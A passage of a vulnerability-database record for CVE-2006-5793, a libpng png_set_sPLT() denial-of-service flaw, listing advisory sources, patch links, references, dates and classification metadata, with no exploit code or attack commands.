CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. 
Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n", "sources": [ { "db": "NVD", "id": "CVE-2006-5793" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "BID", "id": "21078" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2006-5793", "trust": 3.4 }, { "db": "BID", "id": "21078", "trust": 2.7 }, { "db": "SECUNIA", "id": "22900", "trust": 2.4 }, { "db": "SECTRACK", "id": "1017244", 
"trust": 2.4 }, { "db": "SECUNIA", "id": "22950", "trust": 1.6 }, { "db": "SECUNIA", "id": "22956", "trust": 1.6 }, { "db": "SECUNIA", "id": "23208", "trust": 1.6 }, { "db": "SECUNIA", "id": "25329", "trust": 1.6 }, { "db": "SECUNIA", "id": "22889", "trust": 1.6 }, { "db": "SECUNIA", "id": "23335", "trust": 1.6 }, { "db": "SECUNIA", "id": "22951", "trust": 1.6 }, { "db": "SECUNIA", "id": "25742", "trust": 1.6 }, { "db": "SECUNIA", "id": "29420", "trust": 1.6 }, { "db": "SECUNIA", "id": "22958", "trust": 1.6 }, { "db": "SECUNIA", "id": "22941", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2006-4521", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2008-0924", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2006-4568", "trust": 1.6 }, { "db": "XF", "id": "30290", "trust": 1.4 }, { "db": "USCERT", "id": "TA08-079A", "trust": 0.8 }, { "db": "USCERT", "id": "SA08-079A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2006-000961", "trust": 0.8 }, { "db": "MANDRIVA", "id": "MDKSA-2006:212", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:211", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:210", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:209", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE\u0027S ANDROID SDK", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20061204 RPSA-2006-0211-2 DOXYGEN LIBPNG", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20061115 RPSA-2006-0211-1 LIBPNG", "trust": 0.6 }, { "db": "OPENPKG", "id": "OPENPKG-SA-2006.036", "trust": 0.6 }, { "db": "UBUNTU", "id": "USN-383-1", "trust": 0.6 }, { "db": "SUSE", "id": "SUSE-SR:2006:028", "trust": 0.6 }, { "db": "TRUSTIX", "id": "2006-0065", "trust": 0.6 }, { "db": "REDHAT", "id": "RHSA-2007:0356", "trust": 0.6 }, { "db": "APPLE", "id": "APPLE-SA-2008-03-18", "trust": 0.6 }, { "db": "GENTOO", "id": "GLSA-200611-09", "trust": 0.6 }, { "db": "SLACKWARE", "id": "SSA:2006-335-03", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-200611-295", "trust": 0.6 }, { 
"db": "SECUNIA", "id": "32234", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "52296", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52280", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52284", "trust": 0.1 }, { "db": "JVN", "id": "JVN30732239", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "70792", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52286", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "64260", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52285", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "id": "VAR-200611-0210", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.96590906 }, "last_update_date": "2024-07-23T19:44:48.666000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Security Update 2008-002", "trust": 0.8, "url": "http://support.apple.com/kb/ht1249" }, { "title": "Security Update 2008-002", "trust": 0.8, "url": "http://support.apple.com/kb/ht1249?viewlocale=ja_jp" }, { "title": "15 November 2006", "trust": 0.8, "url": "http://libpng.sourceforge.net/libpng-1.2.12-advisory.txt" }, { "title": "Top Page", "trust": 0.8, "url": 
"http://www.libpng.org/" }, { "title": "1511", "trust": 0.8, "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1511" }, { "title": "1023", "trust": 0.8, "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1023" }, { "title": "RHSA-2007:0356", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2007-0356.html" }, { "title": "TLSA-2007-45", "trust": 0.8, "url": "http://www.turbolinux.com/security/2007/tlsa-2007-45.txt" }, { "title": "TLSA-2007-49", "trust": 0.8, "url": "http://www.turbolinux.com/security/2007/tlsa-2007-49.txt" }, { "title": "RHSA-2007:0356", "trust": 0.8, "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0356j.html" }, { "title": "TLSA-2007-45", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2007/tlsa-2007-45j.txt" }, { "title": "TLSA-2007-49", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2007/tlsa-2007-49j.txt" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2006-5793" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.securityfocus.com/bid/21078" }, { "trust": 2.4, "url": "http://securitytracker.com/id?1017244" }, { "trust": 1.9, "url": "http://bugs.gentoo.org/show_bug.cgi?id=154380" }, { "trust": 1.9, "url": "http://support.avaya.com/elmodocs2/security/asa-2007-254.htm" }, { "trust": 1.9, "url": "https://issues.rpath.com/browse/rpl-790" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-200611-09.xml" 
}, { "trust": 1.7, "url": "http://www.coresecurity.com/?action=item\u0026id=2148" }, { "trust": 1.6, "url": "http://www.ubuntu.com/usn/usn-383-1" }, { "trust": 1.6, "url": "http://sourceforge.net/project/shownotes.php?release_id=464278" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22958" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22956" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22900" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22889" }, { "trust": 1.6, "url": "http://bugs.gentoo.org/attachment.cgi?id=101400\u0026action=view" }, { "trust": 1.6, "url": "http://www.trustix.org/errata/2006/0065/" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22951" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22950" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22941" }, { "trust": 1.6, "url": "https://issues.rpath.com/browse/rpl-824" }, { "trust": 1.6, "url": "http://www.redhat.com/support/errata/rhsa-2007-0356.html" }, { "trust": 1.6, "url": "http://www.openpkg.com/security/advisories/openpkg-sa-2006.036.html" }, { "trust": 1.6, "url": "http://www.novell.com/linux/security/advisories/2006_28_sr.html" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:212" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:211" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:210" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:209" }, { "trust": 1.6, "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.465035" }, { "trust": 1.6, "url": "http://secunia.com/advisories/29420" }, { "trust": 1.6, "url": "http://secunia.com/advisories/25742" }, { "trust": 1.6, "url": "http://secunia.com/advisories/25329" }, { "trust": 1.6, "url": "http://secunia.com/advisories/23335" }, { "trust": 1.6, "url": 
"http://secunia.com/advisories/23208" }, { "trust": 1.6, "url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html" }, { "trust": 1.6, "url": "http://docs.info.apple.com/article.html?artnum=307562" }, { "trust": 1.4, "url": "http://www.frsirt.com/english/advisories/2006/4521" }, { "trust": 1.4, "url": "http://xforce.iss.net/xforce/xfdb/30290" }, { "trust": 1.3, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5793" }, { "trust": 1.0, "url": "http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/451874/100/200/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/453484/100/100/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/489135/100/0/threaded" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2006/4521" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2006/4568" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2008/0924/references" }, { "trust": 1.0, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30290" }, { "trust": 1.0, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10324" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnta08-079a/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/tr/trta08-079a/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5793" }, { "trust": 0.8, "url": "http://secunia.com/advisories/22900/" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5793" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:212" }, { "trust": 0.6, "url": 
"http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:211" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:210" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:209" }, { "trust": 0.6, "url": "http://www.frsirt.com/english/advisories/2006/4568" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/453484/100/100/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/451874/100/200/threaded" }, { "trust": 0.6, "url": "http://www.frsirt.com/english/advisories/2008/0924/references" }, { "trust": 0.4, "url": "http://www.mandriva.com/security/" }, { "trust": 0.4, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3334" }, { "trust": 0.4, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3334" }, { "trust": 0.3, "url": "http://www.libpng.org/pub/png/libpng.html" }, { "trust": 0.3, "url": "http://rhn.redhat.com/errata/rhsa-2007-0356.html" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.dsc" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_powerpc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_i386.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_powerpc.udeb" }, { "trust": 0.1, "url": 
"http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_amd64.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18.orig.tar.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.dsc" }, { "trust": 0.1, "url": 
"http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_sparc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.dsc" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_amd64.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng2-dev_1.0.18-1ubuntu3.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_sparc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": 
"http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng2_1.0.18-1ubuntu3.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_i386.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_amd64.deb" }, { "trust": 0.1, "url": "http://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/32234/" }, { "trust": 0.1, "url": "http://secunia.com/binary_analysis/sample_analysis/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13693/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/15986/" }, { "trust": 0.1, "url": "http://jvn.jp/en/jp/jvn30732239/index.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13690/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13688/" }, { "trust": 0.1, "url": "http://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/15610/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13685/" }, { "trust": 0.1, "url": 
"http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13687/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13689/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13686/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13692/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0599" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-1363" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0421" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0598" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597" }, { "trust": 0.1, "url": "http://secunia.com/" }, { "trust": 0.1, "url": "http://www.digicamsoft.com/bmp/bmp.html" }, { "trust": 0.1, "url": "http://www.coresecurity.com." 
}, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5267" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269" }, { "trust": 0.1, "url": "http://code.google.com/android/adc.html" }, { "trust": 0.1, "url": "http://enigmail.mozdev.org" }, { "trust": 0.1, "url": "http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/ar2008021101944.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0986" }, { "trust": 0.1, "url": "http://www.infoworld.com/article/08/02/27/09tc-google-android_1.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0985" }, { "trust": 0.1, "url": "http://www.w3.org/tr/png/" }, { "trust": 0.1, "url": "http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html" }, { "trust": 0.1, "url": "http://code.google.com/p/android/issues" }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs" }, { "trust": 0.1, "url": "http://lists.grok.org.uk/full-disclosure-charter.html" }, { "trust": 0.1, "url": "http://www.wiley.com/wileycda/wileytitle/productcd-047008023x.html" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "http://www.openhandsetalliance.com/android_overview.html" }, { "trust": 0.1, "url": "http://www.w3.org/graphics/gif/spec-gif89a.txt" }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs/." 
}, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268" }, { "trust": 0.1, "url": "http://code.google.com/p/android/downloads/list" } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2006-11-14T00:00:00", "db": "BID", "id": "21078" }, { "date": "2007-06-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "date": "2006-11-19T01:47:03", "db": "PACKETSTORM", "id": "52296" }, { "date": "2006-11-18T01:00:18", "db": "PACKETSTORM", "id": "52280" }, { "date": "2006-11-18T01:41:02", "db": "PACKETSTORM", "id": "52283" }, { "date": "2006-11-18T01:43:05", "db": "PACKETSTORM", "id": "52284" }, { "date": "2008-10-10T23:03:15", "db": "PACKETSTORM", "id": "70792" }, { "date": "2006-11-18T01:44:10", "db": "PACKETSTORM", "id": "52286" }, { "date": 
"2008-03-04T22:33:55", "db": "PACKETSTORM", "id": "64260" }, { "date": "2006-11-18T01:43:39", "db": "PACKETSTORM", "id": "52285" }, { "date": "2006-11-17T00:00:00", "db": "CNNVD", "id": "CNNVD-200611-295" }, { "date": "2006-11-17T23:07:00", "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2008-03-19T02:30:00", "db": "BID", "id": "21078" }, { "date": "2009-04-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "date": "2006-11-30T00:00:00", "db": "CNNVD", "id": "CNNVD-200611-295" }, { "date": "2018-10-17T21:45:05.390000", "db": "NVD", "id": "CVE-2006-5793" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "libpng of png_set_sPLT() Denial of service in function (DoS) Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.6 } }
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.